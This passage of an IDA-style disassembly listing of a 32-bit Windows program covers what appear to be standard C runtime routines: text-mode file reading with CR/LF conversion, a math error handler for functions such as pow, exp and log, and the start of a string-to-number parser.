not eax
test al, 1
jnz short loc_409FA4
loc_409F83: ; CODE XREF: sub_409DAD+BA�j
; sub_409DAD+DD�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 16h
loc_409F95: ; CODE XREF: sub_409DAD+9C�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_409FDF
; ---------------------------------------------------------------------------
loc_409FA4: ; CODE XREF: sub_409DAD+1D4�j
mov eax, edx
push 4
pop ecx
shr eax, 1
cmp eax, ecx
mov [ebp+arg_8], ecx
jb short loc_409FB5
mov [ebp+arg_8], eax
loc_409FB5: ; CODE XREF: sub_409DAD+203�j
push [ebp+arg_8]
call sub_40773A
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz loc_409E99
call sub_4057D3
mov dword ptr [eax], 0Ch
call sub_4057E6
mov dword ptr [eax], 8
loc_409FDF: ; CODE XREF: sub_409DAD+1F5�j
or eax, 0FFFFFFFFh
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_409FE7: ; CODE XREF: sub_409DAD+1BF�j
; sub_409DAD+1C7�j
and byte ptr [eax], 0FBh
loc_409FEA: ; CODE XREF: sub_409DAD+1CC�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A0D0
loc_40A000: ; CODE XREF: sub_409DAD+306�j
mov ecx, [ebp+arg_8]
mov al, [ecx]
cmp al, 1Ah
jz loc_40A0BB
cmp al, 0Dh
jz short loc_40A01D
mov [edi], al
inc edi
inc ecx
mov [ebp+arg_8], ecx
jmp loc_40A0AD
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_409DAD+262�j
mov eax, [ebp+var_10]
dec eax
cmp ecx, eax
jnb short loc_40A03C
lea eax, [ecx+1]
cmp byte ptr [eax], 0Ah
jnz short loc_40A037
inc ecx
inc ecx
mov [ebp+arg_8], ecx
loc_40A032: ; CODE XREF: sub_409DAD+2CA�j
; sub_409DAD+2E3�j
mov byte ptr [edi], 0Ah
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_409DAD+27E�j
mov [ebp+arg_8], eax
jmp short loc_40A0A9
; ---------------------------------------------------------------------------
loc_40A03C: ; CODE XREF: sub_409DAD+276�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_18]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A064
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A0A9
loc_40A064: ; CODE XREF: sub_409DAD+2AB�j
cmp [ebp+var_18], 0
jz short loc_40A0A9
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A087
cmp [ebp+var_1], 0Ah
jz short loc_40A032
mov byte ptr [edi], 0Dh
mov eax, [ebx]
mov cl, [ebp+var_1]
mov [esi+eax+5], cl
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A087: ; CODE XREF: sub_409DAD+2C4�j
cmp edi, [ebp+var_C]
jnz short loc_40A092
cmp [ebp+var_1], 0Ah
jz short loc_40A032
loc_40A092: ; CODE XREF: sub_409DAD+2DD�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_1], 0Ah
jz short loc_40A0AD
loc_40A0A9: ; CODE XREF: sub_409DAD+28D�j
; sub_409DAD+2B5�j ...
mov byte ptr [edi], 0Dh
loc_40A0AC: ; CODE XREF: sub_409DAD+288�j
; sub_409DAD+2D8�j
inc edi
loc_40A0AD: ; CODE XREF: sub_409DAD+26B�j
; sub_409DAD+2FA�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A000
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0BB: ; CODE XREF: sub_409DAD+25A�j
mov eax, [ebx]
lea eax, [esi+eax+4]
test byte ptr [eax], 40h
jnz short loc_40A0CB
or byte ptr [eax], 2
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0CB: ; CODE XREF: sub_409DAD+317�j
mov al, [ecx]
mov [edi], al
inc edi
loc_40A0D0: ; CODE XREF: sub_409DAD+24D�j
; sub_409DAD+30C�j ...
mov eax, edi
sub eax, [ebp+var_C]
cmp [ebp+var_2], 1
mov [ebp+var_10], eax
jnz loc_40A1B2
test eax, eax
jz loc_40A1B2
dec edi
mov cl, [edi]
test cl, cl
js short loc_40A0F7
inc edi
jmp loc_40A17D
; ---------------------------------------------------------------------------
loc_40A0F7: ; CODE XREF: sub_409DAD+342�j
xor eax, eax
inc eax
movzx ecx, cl
jmp short loc_40A10E
; ---------------------------------------------------------------------------
loc_40A0FF: ; CODE XREF: sub_409DAD+368�j
cmp eax, 4
jg short loc_40A117
cmp edi, [ebp+var_C]
jb short loc_40A117
dec edi
movzx ecx, byte ptr [edi]
inc eax
loc_40A10E: ; CODE XREF: sub_409DAD+350�j
cmp ds:byte_423CB8[ecx], 0
jz short loc_40A0FF
loc_40A117: ; CODE XREF: sub_409DAD+355�j
; sub_409DAD+35A�j
mov dl, [edi]
movzx ecx, dl
movsx ecx, ds:byte_423CB8[ecx]
test ecx, ecx
jnz short loc_40A134
call sub_4057D3
mov dword ptr [eax], 2Ah
jmp short loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A134: ; CODE XREF: sub_409DAD+378�j
inc ecx
cmp ecx, eax
jnz short loc_40A13D
add edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A13D: ; CODE XREF: sub_409DAD+38A�j
mov ecx, [ebx]
add ecx, esi
test byte ptr [ecx+4], 48h
jz short loc_40A16B
inc edi
cmp eax, 2
mov [ecx+5], dl
jl short loc_40A159
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+25h], dl
inc edi
loc_40A159: ; CODE XREF: sub_409DAD+3A1�j
cmp eax, 3
jnz short loc_40A167
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+26h], dl
inc edi
loc_40A167: ; CODE XREF: sub_409DAD+3AF�j
sub edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A16B: ; CODE XREF: sub_409DAD+398�j
neg eax
cdq
push 1
push edx
push eax
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
loc_40A17D: ; CODE XREF: sub_409DAD+345�j
; sub_409DAD+38E�j ...
mov eax, [ebp+var_1C]
sub edi, [ebp+var_C]
shr eax, 1
push eax
push [ebp+arg_4]
push edi
push [ebp+var_C]
push 0
push 0FDE9h
call ds:dword_41D0A0
test eax, eax
mov [ebp+var_10], eax
jnz short loc_40A1D5
call ds:dword_41D0F0
loc_40A1A7: ; CODE XREF: sub_409DAD+58C�j
push eax
call sub_4057F9
pop ecx
loc_40A1AE: ; CODE XREF: sub_409DAD+385�j
; sub_409DAD+584�j
or [ebp+var_14], 0FFFFFFFFh
loc_40A1B2: ; CODE XREF: sub_409DAD+1AD�j
; sub_409DAD+32F�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jz short loc_40A1C1
push eax
call sub_403603
pop ecx
loc_40A1C1: ; CODE XREF: sub_409DAD+40B�j
mov eax, [ebp+var_14]
cmp eax, 0FFFFFFFEh
jnz loc_40A34A
mov eax, [ebp+var_10]
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_40A1D5: ; CODE XREF: sub_409DAD+3F2�j
add eax, eax
mov [ebp+var_10], eax
jmp short loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A1DC: ; CODE XREF: sub_409DAD+1B7�j
test edi, edi
jz short loc_40A1EE
mov ecx, [ebp+var_C]
cmp word ptr [ecx], 0Ah
jnz short loc_40A1EE
or byte ptr [eax], 4
jmp short loc_40A1F1
; ---------------------------------------------------------------------------
loc_40A1EE: ; CODE XREF: sub_409DAD+431�j
; sub_409DAD+43A�j
and byte ptr [eax], 0FBh
loc_40A1F1: ; CODE XREF: sub_409DAD+43F�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A307
loc_40A207: ; CODE XREF: sub_409DAD+53A�j
mov eax, [ebp+arg_8]
movzx ecx, word ptr [eax]
cmp cx, 1Ah
jz loc_40A2EF
cmp cx, 0Dh
jz short loc_40A22C
mov [edi], cx
inc edi
inc edi
inc eax
inc eax
mov [ebp+arg_8], eax
jmp loc_40A2E1
; ---------------------------------------------------------------------------
loc_40A22C: ; CODE XREF: sub_409DAD+46E�j
mov ecx, [ebp+var_10]
add ecx, 0FFFFFFFEh
cmp eax, ecx
jnb short loc_40A257
lea ecx, [eax+2]
cmp word ptr [ecx], 0Ah
jnz short loc_40A24F
add eax, 4
mov [ebp+arg_8], eax
loc_40A245: ; CODE XREF: sub_409DAD+4E7�j
; sub_409DAD+513�j
mov word ptr [edi], 0Ah
jmp loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A24F: ; CODE XREF: sub_409DAD+490�j
mov [ebp+arg_8], ecx
jmp loc_40A2DA
; ---------------------------------------------------------------------------
loc_40A257: ; CODE XREF: sub_409DAD+487�j
add [ebp+arg_8], 2
push 0
lea eax, [ebp+var_18]
push eax
push 2
lea eax, [ebp+var_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A280
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A2DA
loc_40A280: ; CODE XREF: sub_409DAD+4C7�j
cmp [ebp+var_18], 0
jz short loc_40A2DA
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A2B6
cmp [ebp+var_8], 0Ah
jz short loc_40A245
mov word ptr [edi], 0Dh
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8]
mov [esi+eax+5], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8+1]
mov [esi+eax+25h], cl
mov eax, [ebx]
mov byte ptr [esi+eax+26h], 0Ah
jmp short loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A2B6: ; CODE XREF: sub_409DAD+4E0�j
cmp edi, [ebp+var_C]
jnz short loc_40A2C2
cmp [ebp+var_8], 0Ah
jz short loc_40A245
loc_40A2C2: ; CODE XREF: sub_409DAD+50C�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFEh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_8], 0Ah
jz short loc_40A2E1
loc_40A2DA: ; CODE XREF: sub_409DAD+4A5�j
; sub_409DAD+4D1�j ...
mov word ptr [edi], 0Dh
loc_40A2DF: ; CODE XREF: sub_409DAD+49D�j
; sub_409DAD+507�j
inc edi
inc edi
loc_40A2E1: ; CODE XREF: sub_409DAD+47A�j
; sub_409DAD+52B�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A207
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2EF: ; CODE XREF: sub_409DAD+464�j
mov ecx, [ebx]
lea esi, [esi+ecx+4]
test byte ptr [esi], 40h
jnz short loc_40A2FF
or byte ptr [esi], 2
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2FF: ; CODE XREF: sub_409DAD+54B�j
mov ax, [eax]
mov [edi], ax
inc edi
inc edi
loc_40A307: ; CODE XREF: sub_409DAD+454�j
; sub_409DAD+540�j ...
sub edi, [ebp+var_C]
mov [ebp+var_10], edi
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A312: ; CODE XREF: sub_409DAD+187�j
; sub_409DAD+192�j ...
call ds:dword_41D0F0
push 5
pop esi
cmp eax, esi
jnz short loc_40A336
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], esi
jmp loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A336: ; CODE XREF: sub_409DAD+570�j
cmp eax, 6Dh
jnz loc_40A1A7
and [ebp+var_14], 0
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A348: ; CODE XREF: sub_409DAD+A6�j
; sub_409DAD+AF�j
xor eax, eax
loc_40A34A: ; CODE XREF: sub_409DAD+235�j
; sub_409DAD+41A�j ...
pop ebx
loc_40A34B: ; CODE XREF: sub_409DAD+66�j
pop edi
loc_40A34C: ; CODE XREF: sub_409DAD+30�j
pop esi
leave
retn
sub_409DAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A34F proc near ; CODE XREF: sub_403B22+C9�p
; sub_409C8D+73�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4215C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A37E
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40A376: ; CODE XREF: sub_40A34F+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A41B
; ---------------------------------------------------------------------------
loc_40A37E: ; CODE XREF: sub_40A34F+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A38C
cmp eax, ds:dword_433C84
jb short loc_40A3AD
loc_40A38C: ; CODE XREF: sub_40A34F+33�j
; sub_40A34F+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40A376
; ---------------------------------------------------------------------------
loc_40A3AD: ; CODE XREF: sub_40A34F+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A38C
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A3F6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409DAD
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F6: ; CODE XREF: sub_40A34F+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A40C: ; CODE XREF: sub_40A34F+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A421
mov eax, [ebp+var_1C]
loc_40A41B: ; CODE XREF: sub_40A34F+2A�j
call __SEH_epilog4
retn
sub_40A34F endp
; =============== S U B R O U T I N E =======================================
sub_40A421 proc near ; CODE XREF: sub_40A34F+C4�p
; DATA XREF: .kSjx934:004215D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40A421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A42B proc near ; CODE XREF: sub_403DA0+B5�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
cmp ds:dword_4262F0, eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
mov byte ptr [ebp+var_8], al
mov byte ptr [ebp+var_8+1], al
mov byte ptr [ebp+var_8+2], al
mov byte ptr [ebp+var_8+3], al
mov byte ptr [ebp+var_8+4], al
mov byte ptr [ebp+var_8+5], al
mov byte ptr [ebp+var_8+6], al
mov byte ptr [ebp+var_8+7], al
jz short loc_40A46D
push ds:dword_433C80
call sub_405193
pop ecx
jmp short loc_40A472
; ---------------------------------------------------------------------------
loc_40A46D: ; CODE XREF: sub_40A42B+32�j
mov eax, offset sub_40F708
loc_40A472: ; CODE XREF: sub_40A42B+40�j
mov ecx, [ebp+arg_C]
mov edx, 0A6h
cmp ecx, edx
jg loc_40A5F6
jz loc_40A5E3
cmp ecx, 19h
jg loc_40A589
jz loc_40A580
mov edx, ecx
push 2
pop ecx
sub edx, ecx
jz loc_40A571
dec edx
jz loc_40A568
sub edx, 5
jz loc_40A559
dec edx
jz loc_40A541
sub edx, 5
jz short loc_40A531
dec edx
jz short loc_40A508
sub edx, 9
jnz loc_40A6A0 ; default
mov [ebp+var_28], 3
loc_40A4D3: ; CODE XREF: sub_40A42B+1AC�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A4DA: ; CODE XREF: sub_40A42B+114�j
; sub_40A42B+138�j ...
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
test eax, eax
pop ecx
jnz loc_40A69B
call sub_4057D3
mov dword ptr [eax], 22h
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A508: ; CODE XREF: sub_40A42B+96�j
mov [ebp+var_24], offset aExp ; "exp"
loc_40A50F: ; CODE XREF: sub_40A42B+15C�j
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
mov [ebp+var_28], 4
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
pop ecx
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A531: ; CODE XREF: sub_40A42B+93�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp ; "exp"
jmp short loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A541: ; CODE XREF: sub_40A42B+8A�j
mov [ebp+var_24], offset aLog10 ; "log10"
loc_40A548: ; CODE XREF: sub_40A42B+144�j
; sub_40A42B+181�j ...
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
jmp loc_40A67B
; ---------------------------------------------------------------------------
loc_40A559: ; CODE XREF: sub_40A42B+83�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog10 ; "log10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A568: ; CODE XREF: sub_40A42B+7A�j
mov [ebp+var_24], offset aLog ; "log"
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A571: ; CODE XREF: sub_40A42B+73�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog ; "log"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A580: ; CODE XREF: sub_40A42B+66�j
mov [ebp+var_24], offset aPow ; "pow"
jmp short loc_40A50F
; ---------------------------------------------------------------------------
loc_40A589: ; CODE XREF: sub_40A42B+60�j
sub ecx, 1Ah
jz short loc_40A5DC
dec ecx
jz short loc_40A5D0
dec ecx
jz short loc_40A5C4 ; jumptable 0040A605 case 1006
dec ecx
jz short loc_40A5B7
sub ecx, 1Dh
jz short loc_40A5AE ; jumptable 0040A605 case 1008
sub ecx, 3
jnz loc_40A6A0 ; default
loc_40A5A5: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aAsin ; jumptable 0040A605 case 1009
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5AE: ; CODE XREF: sub_40A42B+16F�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aAcos ; jumptable 0040A605 case 1008
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5B7: ; CODE XREF: sub_40A42B+16A�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A5BE: ; CODE XREF: sub_40A42B+1E8�j
; sub_40A42B+1F1�j ...
fld qword ptr [edi]
fstp qword ptr [esi]
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5C4: ; CODE XREF: sub_40A42B+167�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aPow ; jumptable 0040A605 case 1006
jmp loc_40A548
; ---------------------------------------------------------------------------
loc_40A5D0: ; CODE XREF: sub_40A42B+164�j
mov [ebp+var_28], 2
jmp loc_40A4D3
; ---------------------------------------------------------------------------
loc_40A5DC: ; CODE XREF: sub_40A42B+161�j
fld1
jmp loc_40A69E
; ---------------------------------------------------------------------------
loc_40A5E3: ; CODE XREF: sub_40A42B+57�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp10 ; "exp10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A5F6: ; CODE XREF: sub_40A42B+51�j
add ecx, 0FFFFFC18h ; switch 13 cases
cmp ecx, 0Ch
ja loc_40A6A0 ; default
jmp off_40A6A7[ecx*4] ; switch jump
loc_40A60C: ; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aLog ; jumptable 0040A605 case 1000
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A615: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aLog10 ; jumptable 0040A605 case 1001
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A61E: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aExp ; jumptable 0040A605 case 1002
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A627: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aAtan ; jumptable 0040A605 case 1003
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A630: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aCeil ; jumptable 0040A605 case 1004
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A639: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aFloor ; jumptable 0040A605 case 1005
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A645: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset aModf ; jumptable 0040A605 case 1007
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A651: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBC0 ; jumptable 0040A605 case 1010
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A65A: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBBC ; jumptable 0040A605 case 1011
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A663: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .kSjx934:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBB8 ; jumptable 0040A605 case 1012
loc_40A66A: ; CODE XREF: sub_40A42B+22D�j
; sub_40A42B+236�j
fld qword ptr [edi]
fmul [ebp+var_8]
fst qword ptr [esi]
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
loc_40A67B: ; CODE XREF: sub_40A42B+129�j
lea ecx, [ebp+var_28]
fstp [ebp+var_10]
push ecx
mov [ebp+var_28], 1
call eax
test eax, eax
pop ecx
jnz short loc_40A69B
call sub_4057D3
mov dword ptr [eax], 21h
loc_40A69B: ; CODE XREF: sub_40A42B+C7�j
; sub_40A42B+D8�j ...
fld [ebp+var_10]
loc_40A69E: ; CODE XREF: sub_40A42B+1B3�j
fstp qword ptr [esi]
loc_40A6A0: ; CODE XREF: sub_40A42B+9B�j
; sub_40A42B+174�j ...
pop edi ; default
pop esi
pop ebx
leave
retn
sub_40A42B endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_40A6A7 dd offset loc_40A60C ; DATA XREF: sub_40A42B+1DA�r
dd offset loc_40A615 ; jump table for switch statement
dd offset loc_40A61E
dd offset loc_40A627
dd offset loc_40A630
dd offset loc_40A639
dd offset loc_40A5C4
dd offset loc_40A645
dd offset loc_40A5AE
dd offset loc_40A5A5
dd offset loc_40A651
dd offset loc_40A65A
dd offset loc_40A663
; =============== S U B R O U T I N E =======================================
sub_40A6DB proc near ; DATA XREF: .kSjx934:0041D2CC�o
and ds:dword_433C78, 0
call sub_40F7D9
mov ds:dword_433C78, eax
xor eax, eax
retn
sub_40A6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A6EF(double)
sub_40A6EF proc near ; CODE XREF: sub_403DA0+7�j
; sub_403DA0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_423DB8
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_40A775
call sub_40FF3C
test eax, eax
pop ecx
pop ecx
jle short loc_40A758
cmp eax, 2
jle short loc_40A74A
cmp eax, 3
jnz short loc_40A758
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_40FDF4
add esp, 10h
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A74A: ; CODE XREF: sub_40A6EF+3F�j
push esi
push ebx
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A758: ; CODE XREF: sub_40A6EF+3A�j
; sub_40A6EF+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_41DBF0
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_40A7B4
; ---------------------------------------------------------------------------
loc_40A775: ; CODE XREF: sub_40A6EF+2F�j
call sub_40FF01
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fcomp [ebp+var_8]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_40A79A
loc_40A78C: ; CODE XREF: sub_40A6EF+AE�j
push esi
push ebx
call sub_41005D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A79A: ; CODE XREF: sub_40A6EF+9B�j
test bl, 20h
jnz short loc_40A78C
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_40A7B4: ; CODE XREF: sub_40A6EF+84�j
call sub_40FE47
add esp, 1Ch
loc_40A7BC: ; CODE XREF: sub_40A6EF+59�j
; sub_40A6EF+67�j ...
pop esi
pop ebx
leave
retn
sub_40A6EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C0 proc near ; CODE XREF: sub_40A9EB:loc_40AA0A�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_40271F
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40A7E1
mov [eax], esi
loc_40A7E1: ; CODE XREF: sub_40A7C0+1D�j
cmp esi, edi
jnz short loc_40A811
loc_40A7E5: ; CODE XREF: sub_40A7C0+5A�j
; sub_40A7C0+60�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40A80A
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A80A: ; CODE XREF: sub_40A7C0+41�j
xor eax, eax
jmp loc_40A9E7
; ---------------------------------------------------------------------------
loc_40A811: ; CODE XREF: sub_40A7C0+23�j
cmp [ebp+arg_C], edi
jz short loc_40A822
cmp [ebp+arg_C], 2
jl short loc_40A7E5
cmp [ebp+arg_C], 24h
jg short loc_40A7E5
loc_40A822: ; CODE XREF: sub_40A7C0+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40A82E: ; CODE XREF: sub_40A7C0+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40A84E
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40CA44
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40A85E
; ---------------------------------------------------------------------------
loc_40A84E: ; CODE XREF: sub_40A7C0+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40A85E: ; CODE XREF: sub_40A7C0+8C�j
test eax, eax
jz short loc_40A867
mov bl, [edi]
inc edi
jmp short loc_40A82E
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A7C0+A0�j
cmp bl, 2Dh
jnz short loc_40A872
